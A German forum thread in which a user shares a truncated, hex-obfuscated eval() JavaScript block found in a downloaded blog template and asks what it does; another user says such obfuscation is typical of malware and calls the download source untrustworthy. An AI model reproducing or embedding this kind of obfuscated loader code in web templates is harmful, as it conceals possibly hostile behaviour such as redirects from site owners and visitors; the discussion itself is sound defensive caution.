✔ Klartext!

[jemand anders]

Hallo,

ich habe mir eine Vorlage aus dem Netz runtergeladen und wollte sie mal testweise installieren. Dabei hing dann irgendwann der Browser. Jetzt versuche ich zu ergründen, woran es liegen könnte und fand u. a. einen Hex-Bereich in der Vorlage. Da er sehr lang ist, habe den gekürzt reingestellt.

var _0xb1b5=["\x31\x7A\x20\x33\x35\x28\x31\x62\x29  9\x62\x6C\x6F\x67\x67\x65\x72\x74\x68\x65\x6D\x65\x73\x7C\x4D\x79\x7C\x54\x68\x65\x6D\x65\x73\x7C\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C\x7C\x76\x69\x73\x69\x62\x6C\x65\x7C\x77\x69\x6E\x64\x6F\x77\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x33\x30\x30\x30","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(_0xf017x1,_0xf017x2,_0xf017x3,_0xf017x4,_0xf017x5,_0xf017x6){_0xf017x5=function(_0xf017x3){return (_0xf017x3<_0xf017x2?_0xb1b5[4]:_0xf017x5(parseInt(_0xf017x3/_0xf017x2)))+((_0xf017x3=_0xf017x3%_0xf017x2)>35?String[_0xb1b5[5]](_0xf017x3+29):_0xf017x3.toString(36))};if(!_0xb1b5[4][_0xb1b5[6]](/^/,String)){while(_0xf017x3--){_0xf017x6[_0xf017x5(_0xf017x3)]=_0xf017x4[_0xf017x3]||_0xf017x5(_0xf017x3)};_0xf017x4=[function(_0xf017x5){return _0xf017x6[_0xf017x5]}];_0xf017x5=function(){return _0xb1b5[7]};_0xf017x3=1;};while(_0xf017x3--){if(_0xf017x4[_0xf017x3]){_0xf017x1=_0xf017x1[_0xb1b5[6]]( new RegExp(_0xb1b5[8]+_0xf017x5(_0xf017x3)+_0xb1b5[8],_0xb1b5[9]),_0xf017x4[_0xf017x3])}};return _0xf017x1;}(_0xb1b5[0],62,202,_0xb1b5[3][_0xb1b5[2]](_0xb1b5[1]),0,{}));

Weiß jemand, warum so etwas in Javascript verwendet wird? Gelesen habe ich den hiermit. Hier ist der gesamte Code.

Grüße

 

[sheel]

Hi

die Art von Obfuscation (also der Code nach Auflösung der Escapes) ist mir bisher nur bei Malware untergekommen.
Bist du dir wirklich sicher, dass man der Scriptquelle vertrauen kann? ....

 

[jemand anders]

Hi sheel,
ne, sicher bin ich mir nicht. Mir ist das suspekt, deshalb ja auch der Post. Wobei ich nicht alles weiß aber gerne dazulerne.
Hier ist die Quelle (Downloadlink).
Grüße

 

[sheel]

Also, ich würd einfach einmal sagen "nicht verwenden". Solang noch kein Schaden entstanden ist ... Nur aus Neugier ist das händische Zerlegen von 8K Code in der Art zu viel Aufwand.

Die verlinkte Quelle ist auch nicht vertrauenswürdig, angefangen mit dem Impressum.
"About us" hat a) einen Verweis auf eine "Mutterseite", die einfach nicht existiert, b) Schlechtes Englisch, c) Ungenaue nutzlose Informationen (zB. Lizenz), d) Eigenwerbung, e) Wirklich "about us" ist nur eine GMail-Adresse.
"Contact us" hat einen Link zum Abuse-Report einer anderen Domain, diese Zielseite weiß aber nichts von der Quellseite.
usw. ...

 

[jemand anders]

Wie gesagt, ich habe es schon runtergeladen (zip) und testweise installiert.

Händisch zerlegen? Hast Du den Link - http://ddecode.com/hexdecoder/?results=f5564862d5a4eb1d5ef15dbfbcb5f7a2 - übersehen?

Ich vermute, das sind Inder, die sprechen manchmal ein bisschen merkwürdiges English.

Also sooo negativ sehe ich das im Moment noch nicht.

 

[sheel]

Den Link hab ich nicht übersehen.
Es hat

\x31\x7A\x20\x33\x35\x28\x31\x62\x29\x7B\x31\x61\x28\x6A\x20\x69\x3D\x3...

zu

1z 35(1b){1a(j i=0;i<20;i++){j A=1b.17.A[i];j Z=A.Y..$t;j M;B(i==1b.17.A.R)19;1a(j k=0;k<A.F.R;k++){B(A.F[k].X=='1r'&&A.F[k].1s=='1x/1m'){j  ...

übersetzt (insgesamt 8KB davon)

Aber verstehst du rein durch lesen, was das macht?
...
Das meinte ich mit zerlegen, an mühsamer Handarbeit führt da kein Weg vorbei.

Das Englisch ist kein großes Problem, ja. Behaupten dass man zu einer nicht existierenden Firma gehört schon eher.

 

[jemand anders]

No, verstehe ich auch nicht. Noch nicht ... Aber zerlegen ist ja auch nicht das gleiche wie verstehen ;-)

 

[sheel]

Ok, dann eben "es leserlich genug zu machen um es verstehen zu können"
Automatisierbar ist der Teil nicht wirklich, das bleibt Handarbeit.

 

[jemand anders]

Ich werde das klären, Sir!

 

[sheel]

Was denn?